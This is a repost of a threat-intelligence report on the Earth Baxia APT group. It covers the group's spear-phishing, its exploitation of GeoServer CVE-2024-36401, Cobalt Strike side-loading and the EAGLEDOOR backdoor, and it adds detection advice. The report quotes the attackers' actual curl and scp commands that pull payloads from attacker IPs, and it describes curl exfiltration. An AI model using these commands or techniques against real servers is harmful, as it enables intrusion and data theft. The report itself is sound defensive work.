{"id":57136,"date":"2024-09-19T00:00:00","date_gmt":"2024-09-19T00:00:00","guid":{"rendered":"urn:uuid:1ba9287e-a244-50b3-736d-5c2f37476c69"},"modified":"2024-09-19T00:00:00","modified_gmt":"2024-09-19T00:00:00","slug":"earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","title":{"rendered":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\"><!-- OneTrust Cookies Consent Notice start for trendmicro.com --><!-- OneTrust Cookies Consent Notice end for trendmicro.com --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"phishing,apt &amp; targeted attacks,articles, news, reports\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2024-09-19\"> <meta property=\"article:tag\" content=\"apt &amp; targeted attacks\"> <meta property=\"article:section\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/i\/earth-baxia-spear-phishing-and-geoserver-exploit.html\"> <title>Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" 
class=\"col-xs-12 col-md-12\" readability=\"11.258177570093\">\n<div class=\"article-details\" role=\"heading\" readability=\"42.095794392523\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">APT &amp; Targeted Attacks<\/p>\n<p class=\"article-details__description\">We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.<\/p>\n<p class=\"article-details__author-by\">By: Ted Lee, Cyris\tTseng, Pierre Lee, Sunny Lu, Philip Chen <time class=\"article-details__date\">September 19, 2024<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\"> <!--Add This--> <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p> <!--Add to Folio--> <!--Subscribe--> <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"50.735163204748\">\n<div class=\"responsive-table-wrap\" readability=\"46.755934718101\">\n<h4>Summary<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">Threat actor Earth Baxia has targeted a government organization in Taiwan \u2013 and potentially other countries in the Asia-Pacific 
(APAC) region \u2013 using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">CVE-2024-36401 is a remote code execution (RCE) vulnerability in GeoServer; exploiting it let the threat actors run commands on the server that downloaded or copied malicious components onto it. Internet-exposed GeoServer instances should be updated to a release that fixes this CVE, and outbound connections from such servers should be restricted, since the observed post-exploitation steps depend on the server reaching attacker-controlled hosts.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads; both techniques run attacker code under legitimate host programs (a crafted MSC file, and a legitimate .NET application redirected through its .config file) rather than a conspicuous standalone executable, which helps the chain evade detection.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Customized Cobalt Strike components were deployed on compromised machines through the two initial access vectors. The altered version of Cobalt Strike included modified internal signatures and a changed configuration structure for evasion.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Earth Baxia also used a new backdoor named EAGLEDOOR, which supports multiple communication protocols (DNS, HTTP, TCP, and the Telegram Bot API) for information gathering and payload delivery.<\/span><\/li>\n<\/ul>\n<p>In July 2024, we observed suspicious activity targeting a government organization in Taiwan, with other APAC countries also likely targeted, attributed to the threat actor Earth Baxia. In these campaigns, Earth Baxia used spear-phishing emails and exploited <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-36401\" target=\"_blank\" rel=\"noopener\">CVE-2024-36401<\/a>, a vulnerability in an open-source server for sharing geospatial data called GeoServer, as initial access vectors, deploying customized Cobalt Strike components on compromised machines. Additionally, we identified a new backdoor called EAGLEDOOR that supports multiple protocols. In this report, we will discuss their infection chain and provide a detailed analysis of the malware involved.<\/p>\n<h4>Attribution and victimology<\/h4>\n<p>Upon investigation, we discovered that multiple servers were hosted on the Alibaba cloud service or located in Hong Kong, and some related samples were submitted to VirusTotal from China. 
After checking one of the Cobalt Strike watermarks (666666) used by the threat actors on Shodan, we also found that only a few machines were linked to this watermark, most of which were in China (Table 1). Therefore, we suspect that the APT group behind these campaigns originates from China. A Cobalt Strike watermark is, however, a weak attribution signal on its own: it identifies a license key rather than an operator, and keys that have leaked are reused by unrelated groups, so this finding should be read together with the hosting and VirusTotal-submission evidence above rather than as independent confirmation.<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td width=\"192\" valign=\"top\"><b>Country<\/b><\/td>\n<td width=\"228\" valign=\"top\"><b>Number of machines<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"192\" valign=\"top\">China<\/td>\n<td width=\"228\" valign=\"top\">13<\/td>\n<\/tr>\n<tr>\n<td width=\"192\" valign=\"top\">Japan<\/td>\n<td width=\"228\" valign=\"top\">1<\/td>\n<\/tr>\n<tr>\n<td width=\"192\" valign=\"top\">Singapore<\/td>\n<td width=\"228\" valign=\"top\">1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 1. Machines linked to the Cobalt Strike watermark 666666<\/span><\/center> <\/p>\n<p>Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand (Figure 1). Notably, we also discovered a decoy document written in simplified Chinese, suggesting that China is also one of the impacted countries. 
However, due to limited information, we cannot accurately determine which sectors in China are affected.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"d79450\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig01-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig01-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 1. Map chart of impacted regions\"> <\/a> <\/p>\n<p><figcaption>Figure 1. Map chart of impacted regions<\/figcaption><\/p>\n<\/figure><\/div>\n<div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<h4>Infection chain<\/h4>\n<p>In this section, we will discuss the threat group\u2019s attack flow as identified by our telemetry, including the malware and tactics, techniques, and procedures (TTPs) involved, as shown in Figure 2.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"811841\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig02-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig02-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 2. Overview of the attack chain\"> <\/a> <\/p>\n<p><figcaption>Figure 2. 
Overview of the attack chain<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"51.635240572172\">\n<div class=\"responsive-table-wrap\" readability=\"49.176419592544\">\n<h4>Initial access<\/h4>\n<h5><b>Vulnerable GeoServer<\/b><\/h5>\n<p>In some cases, Earth Baxia leveraged CVE-2024-36401, a remote code execution (RCE) vulnerability in GeoServer, to execute arbitrary commands: Our investigation revealed that they used commands like \u201ccurl\u201d and \u201cscp\u201d to download or copy malicious components into the victim\u2019s environment (under c:\\windows\\temp), and then executed these components through the same RCE (Table 2).<\/p>\n<p>The file download via curl is as follows:<\/p>\n<p><span class=\"blockquote\">curl --connect-timeout 3 -m 10 -o c:\\windows\\temp\\{file name} http:\/\/<b>167[.]172[.]89[.]142<\/b>\/{file name}<\/span><\/p>\n<p>The remote file copy via scp is as follows:<\/p>\n<p><span class=\"blockquote\">cmd \/c \"scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o UserKnownHostsFile=C:\\windows\\temp\\ t1sc@<b>152[.]42[.]243[.]170<\/b>:\/tmp\/bd\/{file name} c:\\windows\\temp\\\"<\/span><\/p>\n<p>Both commands are useful detection pivots. The GeoServer service process spawning curl, or cmd.exe running scp, to write into c:\\windows\\temp is not normal behavior for a geospatial server, and the scp invocation reaches SSH on a non-standard port (-P 23) with host-key verification disabled (StrictHostKeyChecking=no) so that it succeeds non-interactively against a host the server has never connected to before. The two remote addresses, 167[.]172[.]89[.]142 and 152[.]42[.]243[.]170, should be treated as attacker infrastructure; the latter reappears below as the exfiltration destination.<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"623\">\n<tbody readability=\"3\">\n<tr>\n<td width=\"111\" valign=\"top\"><b>File name<\/b><\/td>\n<td width=\"512\" valign=\"top\"><b>Description<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"111\" valign=\"top\">Edge.exe<\/td>\n<td width=\"512\" valign=\"top\">Legitimate executable used to side-load msedge.dll from the same directory<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"111\" valign=\"top\">msedge.dll<\/td>\n<td width=\"512\" valign=\"top\">Malicious loader (SWORDLDR) used to launch Cobalt Strike (Logs.txt)<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"111\" valign=\"top\">Logs.txt<\/td>\n<td width=\"512\" valign=\"top\">Customized Cobalt Strike shellcode<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 2. 
The malicious components downloaded by RCE exploit<\/span><\/center> <\/p>\n<h5><b>Spear-phishing email vector<\/b><\/h5>\n<p>In early August, Earth Baxia began leveraging phishing emails to advance their attacks. One of the victims reported receiving over 70 phishing emails within approximately two weeks. We also identified similar email attachments on VirusTotal. Analysis of the decoy documents suggests that the attackers may have targeted not just Taiwan, but also Vietnam and China.<\/p>\n<p>Most of the email subjects are meticulously tailored with varying content; the attached ZIP file contains a decoy MSC file, which we named RIPCOY. At this stage, when the user double-clicks this file, the <a href=\"https:\/\/www.elastic.co\/security-labs\/grimresource\" target=\"_blank\" rel=\"noopener\">GrimResource<\/a> technique (code execution from a crafted MSC file) runs the embedded obfuscated VBScript, which attempts to download multiple files from a public cloud service, typically Amazon Web Services (AWS). These files include a decoy PDF document, .NET applications, and a configuration file. MSC is not a document format that end users normally exchange, so an MSC file inside an emailed ZIP archive is itself a strong signal worth blocking or alerting on at the mail gateway.<\/p>\n<p>The .NET applications and configuration file dropped by the MSC file then use a technique known as <a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/014\/\" target=\"_blank\" rel=\"noopener\">AppDomainManager injection<\/a>, which abuses the .NET runtime\u2019s own configuration mechanism: a .config file placed next to a legitimate .NET executable names a custom AppDomainManager assembly, which the runtime loads and runs inside the target application\u2019s process as that application starts. 
It enables the execution of any .NET application to load an arbitrary managed DLL, either locally or remotely from a website, without directly invoking any Windows API calls (Figure 3).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"706480\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig03-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig03-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 3. The configuration file contains download sites loaded by the .NET framework application\"> <\/a> <\/p>\n<p><figcaption>Figure 3. The configuration file contains download sites loaded by the .NET framework application<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The legitimate .NET applications then proceed to download the next-stage downloader based on the URL specified in the .config file, which points to a .NET DLL file (Figure 4). The URL for this download is obfuscated using Base64 and AES encryption. Most of the download sites identified at this stage were hosted on public cloud services, typically Aliyun. 
Once the DLL retrieves the shellcode, it executes it using the CreateThread API, with all processes running entirely in memory.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"aaac95\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig04-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig04-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 4. The .NET DLL file contains a download site with obfuscated code\"> <\/a> <\/p>\n<p><figcaption>Figure 4. The .NET DLL file contains a download site with obfuscated code<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>The shellcode gathers information from the affected machine, including the username, computer name, parent process (the legitimate .NET application), and memory status. It appends this information as a \u2018client_id\u2019 parameter to a URL and sends it to a custom domain. It may receive a 64-character response from the server, which is then used to request the next payload from the URL (Figure 5). 
However, we couldn\u2019t receive the final payload.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"76a6d3\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig05-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig05-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 5. A screenshot of network traffic analysis from the VirusTotal sandbox\"> <\/a> <\/p>\n<p><figcaption>Figure 5. A screenshot of network traffic analysis from the VirusTotal sandbox<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38.5\">\n<div readability=\"22\">\n<p>The shellcode exhibited several distinct features:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">The attacker disguised the domain names to resemble public cloud services by using names like \u201cs3cloud-azure\u201d or \u201cs2cloud-amazon\u201d. 
Each network request followed a specific pattern, including a unique user-agent string and data formatted in JSON.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The final stage of the download process always had the path \u201c\/api\/v1\/homepage\/\u201d, suggesting that the file might still be hosted on a third-party cloud service.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">By hosting files on the cloud, the attacker gains the advantage of easily replacing or updating files, including .config files with different download links, making it significantly more challenging for us to track their activities. The cloud-lookalike domain names above also carry a lesson for defenders: a domain that merely resembles a provider\u2019s naming scheme should not be allow-listed or exempted from egress inspection on the strength of its name.<\/span><\/li>\n<\/ul>\n<p>Although we didn\u2019t confirm what the final shellcode was, our telemetry did reveal that the \u201concesvc.exe\u201d process launched by the MSC file (presumably one of the legitimate .NET applications described above) would run another process, \u201cEdge.exe\u201d, to load the Cobalt Strike components msedge.dll and Logs.txt. In the next section, we discuss these components further.<\/p>\n<h4>Backdoor analysis<\/h4>\n<h5><b>Cobalt Strike<\/b><\/h5>\n<p>Earth Baxia utilizes DLL side-loading to execute Cobalt Strike shellcode (Figure 6): a legitimate Edge.exe copied into a writable directory (c:\\windows\\temp or C:\\Users\\Public in the cases observed here) loads the attacker\u2019s msedge.dll from the same folder. A copy of Edge.exe executing from such a path rather than from its installation directory is therefore a straightforward hunting query for this chain. To evade defenses, the shellcode loader, known as \u201cSWORDLDR,\u201d decrypts the payload and injects it into a specified process according to its embedded configuration (Figure 7).&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"82a7d5\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig06-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig06-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 6. 
Decrypted shellcode\"> <\/a> <\/p>\n<p><figcaption>Figure 6. Decrypted shellcode<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"7cd064\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig07-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig07-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 7. Execution flow of Cobalt Strike components\"> <\/a> <\/p>\n<p><figcaption>Figure 7. Execution flow of Cobalt Strike components<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>The injected shellcode is a customized version of Cobalt Strike. Unlike the usual Cobalt Strike payload, the modified version\u2019s MZ header has been removed and the internal signatures have been modified (Figure 8). Additionally, the structure of the configuration has also been slightly changed (Figure 9). These changes matter for defenders: signature-based Cobalt Strike detections and off-the-shelf beacon configuration extractors that key on the standard header and configuration layout are likely to miss this variant, so detection has to lean on the loader behavior (a relocated Edge.exe side-loading msedge.dll, and SWORDLDR injecting into another process) and on network indicators rather than on the payload bytes.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6.5\">\n<figure class=\"image-figure\" readability=\"3\"> <a id=\"b3ca5f\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig08-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig08-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 8. 
Header differences between the usual (left) and modified (right) versions of Cobalt Strike \"> <\/a> <\/p>\n<p><figcaption>Figure 8. Header differences between the usual (left) and modified (right) versions of Cobalt Strike <\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"image\" readability=\"6.5\">\n<figure class=\"image-figure\" readability=\"3\"> <a id=\"068caa\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig09-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig09-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 9. Differences in configuration structures between the usual (left) and modified (right) versions of Cobalt Strike\"> <\/a> <\/p>\n<p><figcaption>Figure 9. Differences in configuration structures between the usual (left) and modified (right) versions of Cobalt Strike<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"40\">\n<div readability=\"25\">\n<h5><b>EAGLEDOOR<\/b><\/h5>\n<p>On the victim side, we collected these sample sets:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Systemsetting.dll (EAGLEDOOR loader)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Systemsetting.exe<\/span><\/li>\n<\/ul>\n<p>These samples are components of EAGLEDOOR, which was dropped and launched by the Cobalt Strike process mentioned previously.<\/p>\n<p>The threat actors apply DLL side-loading to start the loader and execute EAGLEDOOR in memory. In the loader, there are two DLL files encrypted in the .data section:<\/p>\n<p><b>Hook.dll<\/b><\/p>\n<p>This is the module for hooking the specific API with export function, MyCreateHook, to hook the APIs which are frequently called (Figure 10). 
Once the hooked API is called, the malicious module, Eagle.dll, will be executed.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"7\">\n<figure class=\"image-figure\" readability=\"4\"> <a id=\"b87c96\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig10-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig10-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 10. Loader applies hook.dll to hook the APIs, GetProcAddress, FreeLibrary and LdrUnloadDll\"> <\/a> <\/p>\n<p><figcaption>Figure 10. Loader applies hook.dll to hook the APIs, GetProcAddress, FreeLibrary and LdrUnloadDll<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p><b>Eagle.dll<\/b><\/p>\n<p>The code flow of launching Eagle.dll is shown below. The loader decrypts this module and executes the first export function \u201cRunEagle\u201d in the memory (Figure 11).&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"3b803c\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig11-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig11-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 11. 
The code flow to start Eagle.dll in the loader\"> <\/a> <\/p>\n<p><figcaption>Figure 11. The code flow to start Eagle.dll in the loader<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"42\">\n<div readability=\"29\">\n<p>EAGLEDOOR supports four methods to communicate with a C&amp;C server:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">DNS<\/span><\/li>\n<li><span class=\"rte-red-bullet\">HTTP<\/span><\/li>\n<li><span class=\"rte-red-bullet\">TCP<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Telegram<\/span><\/li>\n<\/ul>\n<p>Upon analysis, the TCP, HTTP, and DNS channels are used to report the victim machine\u2019s status to a C&amp;C server. The main backdoor functionality is implemented over Telegram\u2019s Bot API, using the following methods (which, by their ordinary Bot API semantics, would let an operator poll for commands, receive output and files, and fetch delivered payloads):<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">getFile<\/span><\/li>\n<li><span class=\"rte-red-bullet\">getUpdates<\/span><\/li>\n<li><span class=\"rte-red-bullet\">sendDocument<\/span><\/li>\n<li><span class=\"rte-red-bullet\">sendMessage<\/span><\/li>\n<\/ul>\n<p>These methods are effective for gathering information, delivering files, and executing the next payload on the victim&#8217;s system. However, in this case, we only collected samples related to TCP and HTTP protocols on the victim side. Therefore, we will keep monitoring the channel to track the threat actors&#8217; next steps in their Telegram communications. Because Bot API traffic goes to Telegram\u2019s public API endpoint over HTTPS, it blends in with legitimate use of the service; organizations with no business use for Telegram should consider blocking, or at least alerting on, connections to the Telegram API from servers and workstations.<\/p>\n<h4>Exfiltration<\/h4>\n<p>Based on our investigation, we observed that Earth Baxia would archive the collected data and exfiltrate stolen data by using curl.exe. The destination shown in Figure 12, 152[.]42[.]243[.]170, is the same host that served as the scp source during initial access, so one network indicator covers both payload staging and data theft, and curl.exe uploading from an internal host to a bare IP address is itself a useful alert condition. 
Figure 12 shows a case of data exfiltration to their file server (152[.]42[.]243[.]170) through curl.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"b071c0\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig12-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig12-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 12. The process for exfiltration by curl.exe\"> <\/a> <\/p>\n<p><figcaption>Figure 12. The process for exfiltration by curl.exe<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<h4>Further observations<\/h4>\n<p>Most phishing emails lure users with an attachment. However, based on our telemetry, some phishing emails are sent with a phishing link that downloads a ZIP file. So far, we know there are four combinations at the initial access stage, as shown in Figure 13. Both MSC file and LNK file are able to deliver those two toolsets.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\" readability=\"6\">\n<figure class=\"image-figure\" readability=\"2\"> <a id=\"60b435\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig13-Earth-Baxia-Spear-Phishing-Exploits.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/Fig13-Earth-Baxia-Spear-Phishing-Exploits.png\" alt=\"Figure 13. 
